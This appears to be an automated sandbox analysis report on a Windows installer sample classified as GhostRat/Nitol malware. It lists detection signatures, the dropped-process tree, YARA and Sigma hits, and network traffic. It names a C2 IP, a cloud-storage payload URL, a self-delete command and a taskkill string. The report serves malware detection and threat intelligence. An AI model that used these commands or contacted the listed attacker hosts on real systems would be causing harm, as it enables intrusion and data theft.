Windows Analysis Report
setup#U67e5#U8be2_pf2024.exe

Overview

General Information

Sample name:setup#U67e5#U8be2_pf2024.exe
renamed because original name is a hash value
Original sample name:setup_pf2024.exe
Analysis ID:1408805
MD5:0b69b1391c949736c21ff137d4183b28
SHA1:754b3f30c29157940b35d865c6c1ebdb2dacb0cb
SHA256:a0e1d31cb9dc7495d9a907d91554c95d9301a75e7a639d300717e77e1ef11d64
Tags:exe

Detection

GhostRat, Nitol
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected GhostRat
Yara detected Nitol
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Deletes itself after installation
Drops PE files to the user root directory
Drops PE files with benign system names
Machine Learning detection for sample
PE file has a writeable .text section
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use NTFS Short Name in Command Line
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • setup#U67e5#U8be2_pf2024.exe (PID: 5224 cmdline: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe MD5: 0B69B1391C949736C21FF137D4183B28)
    • Wegame.exe (PID: 5664 cmdline: "C:\users\Wegame\Wegame.exe" MD5: 6B54CAC74E2C36E9A34563018CE99AEA)
    • kill.exe (PID: 5708 cmdline: "C:\users\Statr\kill.exe" MD5: D94C31E9C9C9A1273CC67DC6FFAF9984)
      • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeBroker.exe (PID: 3728 cmdline: "C:\ProgramData\RuntimeBroker.exe" MD5: 67EE3B7CA47FEC435EAB6DDE7AAEDCF7)
    • cmd.exe (PID: 6136 cmdline: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": "154.91.65.2"}
Source | Rule | Description | Author | Strings
00000006.00000002.3338258450.0000000010011000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000006.00000002.3338038973.0000000003520000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
00000006.00000002.3338007089.0000000003313000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Nitol | Yara detected Nitol | Joe Security

Source | Rule | Description | Author | Strings
6.2.RuntimeBroker.exe.3314c24.1.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
6.2.RuntimeBroker.exe.3314c24.1.unpack | JoeSecurity_Nitol | Yara detected Nitol | Joe Security
6.2.RuntimeBroker.exe.3314c24.1.unpack | MALWARE_Win_Nitol | Detects Nitol backdoor | ditekSHen
  • 0x11978:$s2: Applications\iexplore.exe\shell\open\command
  • 0x12ad8:$s3: taskkill /f /im rundll32.exe
  • 0x11024:$s4: \Tencent\Users\*.*
  • 0x11634:$s5: [Pause Break]
  • 0x1187a:$s6: :]%d-%d-%d %d:%d:%d
  • 0x11ac8:$domain: www.xy999.com
6.2.RuntimeBroker.exe.3520c04.2.raw.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security
6.2.RuntimeBroker.exe.3520c04.2.raw.unpack | JoeSecurity_Nitol | Yara detected Nitol | Joe Security

                    System Summary

                    Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ProcessId: 5224, TargetFilename: C:\ProgramData\RuntimeBroker.exe
                    Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\ProgramData\RuntimeBroker.exe" , CommandLine: "C:\ProgramData\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\RuntimeBroker.exe, NewProcessName: C:\ProgramData\RuntimeBroker.exe, OriginalFileName: C:\ProgramData\RuntimeBroker.exe, ParentCommandLine: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ParentImage: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ParentProcessId: 5224, ParentProcessName: setup#U67e5#U8be2_pf2024.exe, ProcessCommandLine: "C:\ProgramData\RuntimeBroker.exe" , ProcessId: 3728, ProcessName: RuntimeBroker.exe
                    Source: Process started; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul, CommandLine: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ParentImage: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe, ParentProcessId: 5224, ParentProcessName: setup#U67e5#U8be2_pf2024.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\SETUP#~1.EXE > nul, ProcessId: 6136, ProcessName: cmd.exe
                    Timestamp:03/14/24-08:46:09.383883
                    SID:2851179
                    Source Port:49701
                    Destination Port:8000
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    AV Detection

                    Source: 6.2.RuntimeBroker.exe.3520c04.2.raw.unpack; Malware Configuration Extractor: GhostRat {"C2 url": "154.91.65.2"}
                    Source: setup#U67e5#U8be2_pf2024.exe; ReversingLabs: Detection: 52%
                    Source: setup#U67e5#U8be2_pf2024.exe; Joe Sandbox ML: detected
                    Source: C:\Users\Wegame\Wegame.exe; Code function: 3_2_6BD260AA __EH_prolog3_GS,CryptAcquireContextW,GetLastError,3_2_6BD260AA
                    Source: C:\Users\Wegame\Wegame.exe; Code function: 3_2_6BF75150 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_6BF75150
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000000.2075450866.000000000049E000.00000002.00000001.01000000.00000003.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_7e90cecb-a
                    Source: setup#U67e5#U8be2_pf2024.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: C:\Users\Statr\kill.exe; File opened: C:\Windows\SysWOW64\MSVCR100.dll
                    Source: unknown; HTTPS traffic detected: 82.156.94.17:443 -> 192.168.2.6:49699 version: TLS 1.2
                    Source: Binary string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdbxx9t source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr
                    Source: Binary string: wextract.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader\Upgrader.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\lib\Release\adapt_for_imports.pdb source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\tools\toolsinstutil.pdbD source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\lib\Release\common.pdb source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\bin\Release\wegame.pdb source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr
                    Source: Binary string: kkeyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: Wegame.exe, 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\setup.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: wextract.pdbe\setup\iexpress\wextract\obj\i386\wextract.pdbU source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\tools\toolsinstutil.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader9x\Upgrader9x.pdbT} source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u60\4407\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr
                    Source: Binary string: D:\build\ob\bora-17171714\bora\build\build\vmui\release\win32\vmware.pdb source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\setup.pdbHyB source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdbPkl source: RuntimeBroker.exe, 00000006.00000002.3338332862.000000006C6B3000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\cacheMod\cacheMod.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdb source: setup#U67e5#U8be2_pf2024.exe, libcef.dll.0.dr
                    Source: Binary string: keyfuncencryptionPBE2PARAMkeylengthprfPBKDF2PARAMcrypto\asn1\p5_pbev2.ccrypto\evp\p5_crpt2.cassertion failed: keylen <= sizeof(key)crypto\hmac\hmac.ccrypto\pkcs12\p12_key.cxn--compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: setup#U67e5#U8be2_pf2024.exe, common.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\apps\upgrader9x\Upgrader9x.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: \loaddll\Release\libcef.pdbP source: setup#U67e5#U8be2_pf2024.exe, libcef.dll.0.dr
                    Source: Binary string: d:\build\ob\bora-1463223\bora-vmsoft\build\release\install\InstUtil\toolsNT\NTinstutil.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: Binary string: E:\dailybuild_dev\wegame_client\build\bin\Release\wegame.pdbhh1GCTL source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.dr
                    Source: Binary string: e\setup\iexpress\wextract\obj\i386\wextract.pdb source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.dr
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: z:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: x:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: v:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: t:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: r:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: p:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: n:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: l:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: j:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: h:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: f:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: b:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: y:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: w:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: u:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: s:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: q:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: o:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: m:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: k:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: i:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: g:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: e:
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe; File opened: c:
                    Source: C:\ProgramData\RuntimeBroker.exe; File opened: [:
                    Source: C:\Users\Statr\kill.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                    Source: C:\Users\Statr\kill.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                    Source: C:\Users\Statr\kill.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                    Source: C:\Users\Statr\kill.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                    Source: C:\Users\Statr\kill.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                    Source: C:\Users\Statr\kill.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                    Source: C:\Users\Statr\kill.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                    Source: C:\Users\Statr\kill.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                    Source: setup#U67e5#U8be2_pf2024.exe; Binary or memory string: AUTORUN.INF;1RR
                    Source: setup#U67e5#U8be2_pf2024.exe; Binary or memory string: autorun.infPX$
                    Source: setup#U67e5#U8be2_pf2024.exe; Binary or memory string: autorun.inf:
                    Source: setup#U67e5#U8be2_pf2024.exe; Binary or memory string: [autorun]
                    Source: winPre2k.iso.0.dr; Binary or memory string: AUTORUN.INF;1RR
                    Source: winPre2k.iso.0.dr; Binary or memory string: autorun.infPX$
                    Source: winPre2k.iso.0.dr; Binary or memory string: autorun.inf:
                    Source: winPre2k.iso.0.dr; Binary or memory string: [autorun]
                    Source: C:\Users\Wegame\Wegame.exe; Code function: 3_2_00463A3A __EH_prolog3_GS,memset,GetModuleFileNameW,?filename@path@filesystem@ierd_tgp@@QBE?AV123@XZ,?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ,memset,FindFirstFileW,memset,wcsncpy_s,wcsncat_s,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindClose,3_2_00463A3A
                    Source: C:\Users\Wegame\Wegame.exe; Code function: 3_2_0045E17A __EH_prolog3_GS,memset,GetEnvironmentVariableW,?get_log_instance@base@@YAPAVILogger@1@XZ,memset,GetModuleFileNameW,wcsrchr,SimpleUString::operator=,memset,GetFileAttributesW,memset,memset,FindFirstFileW,memset,wcscmp,SimpleUString::operator=,wcscmp,wcscmp,FindNextFileW,FindClose,?get_log_instance@base@@YAPAVILogger@1@XZ,3_2_0045E17A
                    Source: C:\Users\Wegame\Wegame.exe; Code function: 3_2_0040F650 _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,FindFirstFileW,wcscpy_s,_invalid_parameter_noinfo_noreturn,3_2_0040F650
                    Source: C:\Users\Wegame\Wegame.exe; Code function: 3_2_0045DF3C __EH_prolog3_GS,memset,memset,FindFirstFileW,memset,wcscmp,wcscmp,memset,DeleteFileW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,?get_log_instance@base@@YAPAVILogger@1@XZ,GetLastError,3_2_0045DF3C
                    Source: C:\ProgramData\RuntimeBroker.exe; Code function: 6_2_005F18B3 FindFirstFileExW,6_2_005F18B3
                    Source: C:\ProgramData\RuntimeBroker.exe; Code function: 6_2_03522164 SHGetSpecialFolderPathA,FindFirstFileA,6_2_03522164
                    Source: C:\ProgramData\RuntimeBroker.exe; Code function: 6_2_10001560 SHGetSpecialFolderPathA,FindFirstFileA,6_2_10001560
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe; File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe; File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe; File opened: C:\Users\user\AppData\Roaming
                    Source: C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\ProgramData\RuntimeBroker.exe; Code function: 4x nop then push ebx, 6_2_0352783A

                    Networking

                    Source: Traffic; Snort IDS: 2851179 ETPRO TROJAN PurpleFox Backdoor/Rootkit Checkin M2 192.168.2.6:49701 -> 154.91.65.2:8000
                    Source: Malware configuration extractor; URLs: 154.91.65.2
                    Source: global traffic; TCP traffic: 192.168.2.6:49701 -> 154.91.65.2:8000
                    Source: global traffic; UDP traffic: 192.168.2.6:57216 -> 103.7.30.61:8000
                    Source: global traffic; UDP traffic: 192.168.2.6:63130 -> 103.7.30.83:8000
                    Source: Joe Sandbox View; ASN Name: IKGUL-26484US IKGUL-26484US
                    Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: global traffic; HTTP traffic detected: GET /guofucheng.txt HTTP/1.1, Accept: */*, User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0), Host: chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com, Cache-Control: no-cache
                    Source: unknown; TCP traffic detected without corresponding DNS query: 154.91.65.2
                    Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknown; DNS traffic detected: queries for: chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0H
                    Source: setup#U67e5#U8be2_pf2024.exe, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0I
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0L
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, jli.dll.0.dr, libcef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: setup#U67e5#U8be2_pf2024.exe, adapt_for_imports.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drString found in binary or memory: http://ocsp.thawte.com0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://s2.symcb.com0
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://sf.symcb.com/sf.crl0a
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, Lua51.dll.0.drString found in binary or memory: http://sf.symcd.com0&
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://sv.symcd.com0&
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                    Source: setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                    Source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drString found in binary or memory: http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a
                    Source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drString found in binary or memory: http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a-s-f
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, adapt_for_imports.dll.0.dr, jli.dll.0.dr, libcef.dll.0.dr, Wegame.exe.0.dr, common.dll.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: setup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.drString found in binary or memory: http://www.google.com
                    Source: setup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.drString found in binary or memory: http://www.google.comcefsimplestring
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://www.symauth.com/cps0(
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drString found in binary or memory: http://www.symauth.com/rpa00
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, winPre2k.iso.0.drString found in binary or memory: http://www.vmware.com/0
                    Source: setup#U67e5#U8be2_pf2024.exe, wm.exe.0.drString found in binary or memory: http://www.vmware.com/0/
                    Source: wm.exe.0.drString found in binary or memory: http://www.vmware.com/go/vcloud_login
                    Source: setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drString found in binary or memory: http://www.vmware.com/support/reference/common/info_tools.html.
                    Source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll
                    Source: setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drString found in binary or memory: http://www.winimage.com/zLibDll1.2.5
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000001FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/
                    Source: setup#U67e5#U8be2_pf2024.exeString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txt
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtPF
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246646530.0000000003A60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtl
                    Source: setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtmF
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownHTTPS traffic detected: 82.156.94.17:443 -> 192.168.2.6:49699 version: TLS 1.2
                    Source: C:\ProgramData\RuntimeBroker.exeCode function: 6_2_035220C4 OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,6_2_035220C4
